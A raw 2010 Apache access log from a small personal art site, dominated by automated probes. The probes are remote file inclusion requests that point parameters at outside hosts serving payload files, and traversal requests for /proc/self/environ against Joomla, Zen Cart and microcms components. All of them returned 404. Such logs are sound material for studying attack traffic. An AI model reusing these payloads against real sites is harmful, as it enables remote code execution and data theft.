123.30.181.5 - - [15/May/2010:12:36:19 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:36:19 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:36:19 -0500] "GET //poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:36:21 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:36:21 -0500] "GET //poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:36:21 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:36:47 -0500] "GET /logs/access_log.1273363200%20%20//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:36:53 -0500] "GET /logs/access_log.1273363200%20%20//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:36:58 -0500] "GET /logs/access_log.1273363200//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:36:59 -0500] "GET /logs/access_log.1273363200%20%20//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:37:02 -0500] "GET /logs/access_log.1273363200//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
123.30.181.5 - - [15/May/2010:12:37:08 -0500] "GET /logs/access_log.1273363200//poll/poll_ssi.php?include_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
204.152.200.50 - - [15/May/2010:12:37:09 -0500] "GET /logs/access_log.1211760000/index1.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:12:37:09 -0500] "GET /logs/access_log.1211760000/index1.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
174.133.232.18 - - [15/May/2010:12:37:54 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:37:54 -0500] "GET //poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:37:56 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:38:03 -0500] "GET //poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:38:04 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:38:04 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
80.65.166.74 - - [15/May/2010:12:38:07 -0500] "GET /logs/access_log.1273276800///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
80.65.166.74 - - [15/May/2010:12:38:07 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
80.65.166.74 - - [15/May/2010:12:38:11 -0500] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
174.133.232.18 - - [15/May/2010:12:38:39 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:38:39 -0500] "GET //poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:38:39 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:39:01 -0500] "GET //poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:39:02 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:39:02 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:39:07 -0500] "GET //poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:39:07 -0500] "GET /logs/access_log.1273363200//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:39:07 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:39:09 -0500] "GET /logs/access_log.1273363200%20%20//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:39:15 -0500] "GET //poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:39:15 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:39:15 -0500] "GET /logs/access_log.1273363200//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:39:23 -0500] "GET /logs/access_log.1273363200%20%20//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:12:39:51 -0500] "GET /artwork/music.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
174.133.232.18 - - [15/May/2010:12:40:10 -0500] "GET /logs/access_log.1273363200//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
174.133.232.18 - - [15/May/2010:12:40:15 -0500] "GET /logs/access_log.1273363200//poll/poll_ssi.php?include_path=http://www.autofind.co.za/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.245.21.109 - - [15/May/2010:12:41:53 -0500] "GET /logs/access_log.1273276800/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.245.21.109 - - [15/May/2010:12:41:54 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
211.245.21.109 - - [15/May/2010:12:41:54 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
211.245.21.109 - - [15/May/2010:12:43:08 -0500] "GET /logs/access_log.1273190400/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.129.119.43 - - [15/May/2010:12:48:12 -0500] "GET /logs/?N=D HTTP/1.1" 200 5638 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.43 - - [15/May/2010:12:49:12 -0500] "GET /artwork/trunks.htm HTTP/1.1" 200 1275 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [15/May/2010:12:49:45 -0500] "GET /logs/access_log.1189209600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.129.119.43 - - [15/May/2010:12:50:13 -0500] "GET /logs/access_log.1273622400 HTTP/1.1" 200 446022 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [15/May/2010:12:50:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.25.28.188 - - [15/May/2010:12:53:32 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.808"
207.46.195.223 - - [15/May/2010:12:54:09 -0500] "GET /logs/access_log.1213660800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.88.4.141 - - [15/May/2010:12:54:19 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.79"
87.250.255.243 - - [15/May/2010:12:57:03 -0500] "GET /artwork/jewelrybox.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
85.18.127.213 - - [15/May/2010:12:59:40 -0500] "GET /logs/access_log.1219968000/microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:12:59:40 -0500] "GET /microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:12:59:41 -0500] "GET /logs/microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:13:00:11 -0500] "GET /logs/access_log.1219968000/microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:13:00:11 -0500] "GET /microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:13:00:11 -0500] "GET /logs/microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 "-""libwww-perl/5.805"
207.46.204.178 - - [15/May/2010:13:01:40 -0500] "GET /logs/access_log.1175558400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [15/May/2010:13:02:35 -0500] "GET /logs/access_log.1213833600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [15/May/2010:13:03:29 -0500] "GET /logs/access_log.1272585600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
85.25.28.188 - - [15/May/2010:13:03:45 -0500] "GET /logs/access_log.1273363200//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.808"
85.25.28.188 - - [15/May/2010:13:03:46 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.808"
85.25.28.188 - - [15/May/2010:13:03:46 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.808"
207.46.13.134 - - [15/May/2010:13:07:39 -0500] "GET /logs/access_log.1235174400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.177.125 - - [15/May/2010:13:07:47 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.111.176.22 - - [15/May/2010:13:08:01 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
89.111.176.22 - - [15/May/2010:13:08:01 -0500] "GET /logs/access_log.1262649600/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
89.111.176.22 - - [15/May/2010:13:08:01 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.43.201.70 - - [15/May/2010:13:08:44 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:13:08:47 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:13:08:50 -0500] "GET /logs/access_log.1271635200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.141 - - [15/May/2010:13:11:18 -0500] "GET /logs/access_log.1273363200//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.79"
121.88.4.141 - - [15/May/2010:13:11:18 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.79"
121.88.4.141 - - [15/May/2010:13:11:19 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.79"
87.250.255.243 - - [15/May/2010:13:18:14 -0500] "GET /logs/access_log.1273363200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [15/May/2010:13:21:58 -0500] "GET /logs/access_log.1272153600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [15/May/2010:13:26:16 -0500] "GET /logs/access_log.1273017600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
137.132.250.6 - - [15/May/2010:13:30:30 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
137.132.250.6 - - [15/May/2010:13:30:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
137.132.250.6 - - [15/May/2010:13:30:55 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
137.132.250.6 - - [15/May/2010:13:30:56 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
137.132.250.6 - - [15/May/2010:13:30:56 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
137.132.250.6 - - [15/May/2010:13:30:57 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
137.132.250.6 - - [15/May/2010:13:30:58 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
137.132.250.6 - - [15/May/2010:13:31:06 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
137.132.250.6 - - [15/May/2010:13:31:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
85.25.28.188 - - [15/May/2010:13:31:57 -0500] "GET /logs/access_log.1273276800//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.808"
87.250.255.243 - - [15/May/2010:13:32:44 -0500] "GET /logs/access_log.1271116800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [15/May/2010:13:39:11 -0500] "GET /artwork/sculptures.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
193.147.173.214 - - [15/May/2010:13:42:29 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:13:42:29 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:13:42:30 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.123.133.162 - - [15/May/2010:13:45:01 -0500] "GET /logs/access_log.1273190400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
174.123.133.162 - - [15/May/2010:13:45:01 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.123.133.162 - - [15/May/2010:13:45:01 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
211.169.249.251 - - [15/May/2010:13:46:27 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:13:46:27 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
87.250.255.243 - - [15/May/2010:13:46:44 -0500] "GET /artwork/carousel.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [15/May/2010:13:46:57 -0500] "GET /logs/access_log.1207958400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.108.177.125 - - [15/May/2010:13:48:19 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.88.4.141 - - [15/May/2010:13:50:32 -0500] "GET /logs/access_log.1273276800//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.79"
94.23.219.226 - - [15/May/2010:13:51:52 -0500] "GET /logs/access_log.1271894400//index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.219.226 - - [15/May/2010:13:51:52 -0500] "GET //index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.219.226 - - [15/May/2010:13:51:52 -0500] "GET /logs//index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
193.147.173.214 - - [15/May/2010:13:52:00 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:13:52:10 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:13:52:16 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.112.35.52 - - [15/May/2010:13:53:52 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:13:54:50 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:13:54:50 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:13:55:21 -0500] "GET /artwork/coffins.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
211.169.249.251 - - [15/May/2010:13:55:51 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:13:55:51 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:13:55:52 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
64.251.10.117 - - [15/May/2010:13:57:37 -0500] "GET /logs/access_log.1271894400//index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.251.10.117 - - [15/May/2010:13:57:38 -0500] "GET //index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.251.10.117 - - [15/May/2010:13:57:38 -0500] "GET /logs//index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.251.10.117 - - [15/May/2010:13:58:00 -0500] "GET /logs/access_log.1271894400//index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.251.10.117 - - [15/May/2010:13:58:00 -0500] "GET //index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.251.10.117 - - [15/May/2010:13:58:00 -0500] "GET /logs//index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
114.108.177.125 - - [15/May/2010:13:59:01 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.61.185.200 - - [15/May/2010:13:59:53 -0500] "GET /logs/access_log.1271894400//index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
200.61.185.200 - - [15/May/2010:13:59:53 -0500] "GET //index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [15/May/2010:13:59:54 -0500] "GET /logs//index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
193.147.173.214 - - [15/May/2010:14:00:04 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:00:04 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:00:04 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:14:00:07 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:14:00:07 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.61.185.200 - - [15/May/2010:14:00:22 -0500] "GET /logs/access_log.1271894400//index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
200.61.185.200 - - [15/May/2010:14:00:22 -0500] "GET //index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [15/May/2010:14:00:23 -0500] "GET /logs//index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
193.147.173.214 - - [15/May/2010:14:00:28 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:00:28 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:00:28 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
